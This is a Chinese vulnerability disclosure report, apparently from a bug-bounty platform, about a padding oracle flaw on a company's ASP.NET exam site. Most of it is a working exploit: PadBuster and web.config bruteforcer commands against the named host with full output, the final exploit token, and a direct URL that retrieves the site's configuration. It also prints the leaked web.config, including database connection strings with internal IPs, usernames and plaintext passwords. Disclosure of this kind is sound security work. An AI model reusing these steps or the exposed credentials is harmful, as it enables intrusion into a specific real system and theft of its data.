2015-07-13: 细节已通知厂商并且等待厂商处理中 2015-07-14: 厂商已经确认,细节仅向厂商公开 2015-07-24: 细节向核心白帽子及相关领域专家公开 2015-08-03: 细节向普通白帽子公开 2015-08-13: 细节向实习白帽子公开 2015-08-28: 细节向公众公开
向心力通信技术股份有限公司某站padding orcal漏洞
1、检测http://kaoshi.centfor.com/WebResource.axd?d=1436061238 疑似存在padding orcal漏洞
2、直接上脚本跑一跑
padBuster.pl http://kaoshi.centfor.com/WebResource.axd?d=9MBwmxN6TLKjC8S3CdFGyw2 9MBwmxN6TLKjC8S3CdFGyw2 16 -encoding 3 -plaintext "|||~/web.config"+-------------------------------------------+| PadBuster - v0.3 || Brian Holyfield - Gotham Digital Science || labs@gdssecurity.com |+-------------------------------------------+INFO: The original request returned the following[+] Status: 500[+] Location: N/A[+] Content Length: 4843INFO: Starting PadBuster Encrypt Mode[+] Number of Blocks: 1INFO: No error string was provided...starting response analysis*** Response Analysis Complete ***The following response signatures were returned:-------------------------------------------------------ID# Freq Status Length Location-------------------------------------------------------1 1 500 3721 N/A2 ** 255 500 4843 N/A-------------------------------------------------------Enter an ID that matches the error conditionNOTE: The ID# marked with ** is recommended : 2Continuing test with selection 2[+] Success: (100) [Byte 16][+] Success: (89) [Byte 15][+] Success: (199) [Byte 14][+] Success: (79) [Byte 13]ERROR: 500 Can't connect to kaoshi.centfor.com:80 Retrying in 10 seconds...[+] Success: (31) [Byte 12][+] Success: (54) [Byte 11][+] Success: (147) [Byte 10][+] Success: (131) [Byte 9][+] Success: (64) [Byte 8][+] Success: (192) [Byte 7][+] Success: (24) [Byte 6][+] Success: (24) [Byte 5][+] Success: (0) [Byte 4][+] Success: (157) [Byte 3][+] Success: (94) [Byte 2][+] Success: (132) [Byte 1]Block 1 Results:[+] New Cipher Text (HEX): e82def733b64af2ba5f75f742dad3c64[+] Intermediate Bytes (HEX): 9451930d1413ca498b94301a4bc45b65-------------------------------------------------------** Finished ***[+] Encrypted value is: 6C3vcztkryul9190La08ZAAAAAAAAAAAAAAAAAAAAAA1-------------------------------------------------------
成功获取了一个值 6C3vcztkryul9190La08ZAAAAAAAAAAAAAAAAAAAAAA1 ,可以进行下一步的操作3、这个时间比较长,耐心等待即可
Web.config_bruter.pl http://kaoshi.centfor.com/ScriptResource.axd 6C3vcztkryul9190La08ZAAAAAAAAAAAAAAAAAAAAAA1 16<?xml version="1.0"?><!-- 注意: 除了手动编辑此文件以外,您还可以使用 Web 管理工具来 配置应用程序的设置。 可以使用 Visual Studio 中的“网站”->“Asp.Net 配置”选项。 设置和注释的完整列表在 machine.config.comments 中, 该文件通常位于 \Windows\Microsoft.Net\Framework\v2.x\Config 中--><configuration> <configSections> <sectionGroup name="system.web.extensions" type="System.Web.Configuration.SystemWebExtensionsSectionGroup, System.Web.Extensions, Version=3.5.0.0, Culture=neutral, PublicKeyToken=31BF3856AD364E35"> <sectionGroup name="scripting" type="System.Web.Configuration.ScriptingSectionGroup, System.Web.Extensions, Version=3.5.0.0, Culture=neutral, PublicKeyToken=31BF3856AD364E35"> <section name="scriptResourceHandler" type="System.Web.Configuration.ScriptingScriptResourceHandlerSection, System.Web.Extensions, Version=3.5.0.0, Culture=neutral, PublicKeyToken=31BF3856AD364E35" requirePermission="false" allowDefinition="MachineToApplication"/> <sectionGroup name="webServices" type="System.Web.Configuration.ScriptingWebServicesSectionGroup, System.Web.Extensions, Version=3.5.0.0, Culture=neutral, PublicKeyToken=31BF3856AD364E35"> <section name="jsonSerialization" type="System.Web.Configuration.ScriptingJsonSerializationSection, System.Web.Extensions, Version=3.5.0.0, Culture=neutral, PublicKeyToken=31BF3856AD364E35" requirePermission="false" allowDefinition="Everywhere"/> <section name="profileService" type="System.Web.Configuration.ScriptingProfileServiceSection, System.Web.Extensions, Version=3.5.0.0, Culture=neutral, PublicKeyToken=31BF3856AD364E35" requirePermission="false" allowDefinition="MachineToApplication"/> <section name="authenticationService" type="System.Web.Configuration.ScriptingAuthenticationServiceSection, System.Web.Extensions, Version=3.5.0.0, Culture=neutral, PublicKeyToken=31BF3856AD364E35" requirePermission="false" allowDefinition="MachineToApplication"/> <section name="roleService" type="System.Web.Configuration.ScriptingRoleServiceSection, System.Web.Extensions, Version=3.5.0.0, Culture=neutral, PublicKeyToken=31BF3856AD364E35" requirePermission="false" allowDefinition="MachineToApplication"/> </sectionGroup> </sectionGroup> </sectionGroup> </configSections> <appSettings/> <connectionStrings> <add name="ExamConnString" connectionString="Data Source=10.0.0.21;Failover Partner=10.0.4.49;Initial Catalog=Centfor_Exam;User ID=centfor_Exam;pwd=centfor_Exam_11@centfor;Max Pool Size = 512;" providerName="System.Data.SqlClient" /> <!--前台登陆用 --> <add name="LoginString" connectionString="Data Source=10.0.0.21;Failover Partner=10.0.4.49;Initial Catalog=oa_human;User ID=oa_human_reader;pwd=oa_human_reader@centfor;Max Pool Size = 512;" providerName="System.Data.SqlClient"/> <!--前台用户登陆SQL语句! UserInfo用户表;UserID:正式工号;TemporaryUserID:临时工号;UserPwd:密码;[Status] 状态(0:临时、1:正式、2:离职) --> <add name="LoginSQL" connectionString="select WorkNO,TempWorkNO,[PassWord],[UserWorkState] from [User] where ([PassWord]=@userPwd and WorkNO=@userID and [UserWorkState]=1) or ( TempWorkNO=@userID and [PassWord]=@userPwd and [UserWorkState]=0)" /> <add name="Centfor_ExamConnectionString1" connectionString="Data Source=sea;Initial Catalog=Centfor_Exam;Persist Security Info=True;User ID=sa;MultipleActiveResultSets=False;Packet Size=4096;Application Name="Microsoft SQL Server Management Studio"" providerName="System.Data.SqlClient"/> </connectionStrings> <system.web> <sessionState mode="InProc" timeout="150" /> <customErrors mode="Off"/> <!-- 设置 compilation debug="true" 可将调试符号 插入已编译的页面中。 但由于这会影响性能,因此只在开发过程中将此值 设置为 true。 --> <compilation debug="true"> <assemblies> <add assembly="System.Core, Version=3.5.0.0, Culture=neutral, PublicKeyToken=B77A5C561934E089"/> <add assembly="System.Web.Extensions, Version=3.5.0.0, Culture=neutral, PublicKeyToken=31BF3856AD364E35"/> <add assembly="System.Data.DataSetExtensions, Version=3.5.0.0, Culture=neutral, PublicKeyToken=B77A5C561934E089"/> <add assembly="System.Xml.Linq, Version=3.5.0.0, Culture=neutral, PublicKeyToken=B77A5C561934E089"/> </assemblies> </compilation> <!-- 通过 <authentication> 节可以配置 ASP.NET 用来 识别进入用户的 安全身份验证模式。 --> <authentication mode="Windows"/> <!-- 如果在执行请求的过程中出现未处理的错误, 则通过 <customErrors> 节可以配置相应的处理步骤。 具体说来, 开发人员通过该节可以配置 要显示的 HTML 错误页以代替错误堆栈跟踪。 <customErrors mode="RemoteOnly" defaultRedirect="GenericErrorPage.htm"> <error statusCode="403" redirect="NoAccess.htm" /> <error statusCode="404" redirect="FileNotFound.htm" /> </customErrors> --> <pages> <controls> <add tagPrefix="asp" namespace="System.Web.UI" assembly="System.Web.Extensions, Version=3.5.0.0, Culture=neutral, PublicKeyToken=31BF3856AD364E35"/> <add tagPrefix="asp" namespace="System.Web.UI.WebControls" assembly="System.Web.Extensions, Version=3.5.0.0, Culture=neutral, PublicKeyToken=31BF3856AD364E35"/> </controls> </pages> <httpHandlers> <remove verb="*" path="*.asmx"/> <add verb="*" path="*.asmx" validate="false" type="System.Web.Script.Services.ScriptHandlerFactory, System.Web.Extensions, Version=3.5.0.0, Culture=neutral, PublicKeyToken=31BF3856AD364E35"/> <add verb="*" path="*_AppService.axd" validate="false" type="System.Web.Script.Services.ScriptHandlerFactory, System.Web.Extensions, Version=3.5.0.0, Culture=neutral, PublicKeyToken=31BF3856AD364E35"/> <add verb="GET,HEAD" path="ScriptResource.axd" type="System.Web.Handlers.ScriptResourceHandler, System.Web.Extensions, Version=3.5.0.0, Culture=neutral, PublicKeyToken=31BF3856AD364E35" validate="false"/> </httpHandlers> <httpModules> <add name="ScriptModule" type="System.Web.Handlers.ScriptModule, System.Web.Extensions, Version=3.5.0.0, Culture=neutral, PublicKeyToken=31BF3856AD364E35"/> </httpModules> </system.web> <system.codedom> <compilers> <compiler language="c#;cs;csharp" extension=".cs" warningLevel="4" type="Microsoft.CSharp.CSharpCodeProvider, System, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089"> <providerOption name="CompilerVersion" value="v3.5"/> <providerOption name="WarnAsError" value="false"/> </compiler> <compiler language="vb;vbs;visualbasic;vbscript" extension=".vb" warningLevel="4" type="Microsoft.VisualBasic.VBCodeProvider, System, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089"> <providerOption name="CompilerVersion" value="v3.5"/> <providerOption name="OptionInfer" value="true"/> <providerOption name="WarnAsError" value="false"/> </compiler> </compilers> </system.codedom> <!-- 在 Internet 信息服务 7.0 下运行 ASP.NET AJAX 需要 system.webServer 节。 对早期版本的 IIS 来说则不需要此节。 --> <system.webServer> <validation validateIntegratedModeConfiguration="false"/> <modules> <remove name="ScriptModule"/> <add name="ScriptModule" preCondition="managedHandler" type="System.Web.Handlers.ScriptModule, System.Web.Extensions, Version=3.5.0.0, Culture=neutral, PublicKeyToken=31BF3856AD364E35"/> </modules> <handlers> <remove name="WebServiceHandlerFactory-Integrated"/> <remove name="ScriptHandlerFactory"/> <remove name="ScriptHandlerFactoryAppServices"/> <remove name="ScriptResource"/> <add name="ScriptHandlerFactory" verb="*" path="*.asmx" preCondition="integratedMode" type="System.Web.Script.Services.ScriptHandlerFactory, System.Web.Extensions, Version=3.5.0.0, Culture=neutral, PublicKeyToken=31BF3856AD364E35"/> <add name="ScriptHandlerFactoryAppServices" verb="*" path="*_AppService.axd" preCondition="integratedMode" type="System.Web.Script.Services.ScriptHandlerFactory, System.Web.Extensions, Version=3.5.0.0, Culture=neutral, PublicKeyToken=31BF3856AD364E35"/> <add name="ScriptResource" preCondition="integratedMode" verb="GET,HEAD" path="ScriptResource.axd" type="System.Web.Handlers.ScriptResourceHandler, System.Web.Extensions, Version=3.5.0.0, Culture=neutral, PublicKeyToken=31BF3856AD364E35"/> </handlers> </system.webServer> <runtime> <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1"> <dependentAssembly> <assemblyIdentity name="System.Web.Extensions" publicKeyToken="31bf3856ad364e35"/> <bindingRedirect oldVersion="1.0.0.0-1.1.0.0" newVersion="3.5.0.0"/> </dependentAssembly> <dependentAssembly> <assemblyIdentity name="System.Web.Extensions.Design" publicKeyToken="31bf3856ad364e35"/> <bindingRedirect oldVersion="1.0.0.0-1.1.0.0" newVersion="3.5.0.0"/> </dependentAssembly> </assemblyBinding> </runtime></configuration>Total Requests:37787Resulting Exploit Block:St4cwGLSxLvJvpelabVozOgt73M7ZK8rpfdfdC2tPGQAAAAAAAAAAAAAAAAAAAAA0
获取最终需要的值St4cwGLSxLvJvpelabVozOgt73M7ZK8rpfdfdC2tPGQAAAAAAAAAAAAAAAAAAAAA0
访问该链接即可直接查看配置http://kaoshi.centfor.com/ScriptResource.axd?d=St4cwGLSxLvJvpelabVozOgt73M7ZK8rpfdfdC2tPGQAAAAAAAAAAAAAAAAAAAAA0
数据库信息泄露
<add name="ExamConnString" connectionString="Data Source=10.0.0.21;Failover Partner=10.0.4.49;Initial Catalog=Centfor_Exam;User ID=centfor_Exam;pwd=centfor_Exam_11@centfor;Max Pool Size = 512;" providerName="System.Data.SqlClient"
<add name="LoginString" connectionString="Data Source=10.0.0.21;Failover Partner=10.0.4.49;Initial Catalog=oa_human;User ID=oa_human_reader;pwd=oa_human_reader@centfor;Max Pool Size = 512;" providerName="System.Data.SqlClient"/>
修复漏洞
危害等级:低
漏洞Rank:5
确认时间:2015-07-14 09:21
感谢白帽子协助我们提高我们系统的安全性。
暂无
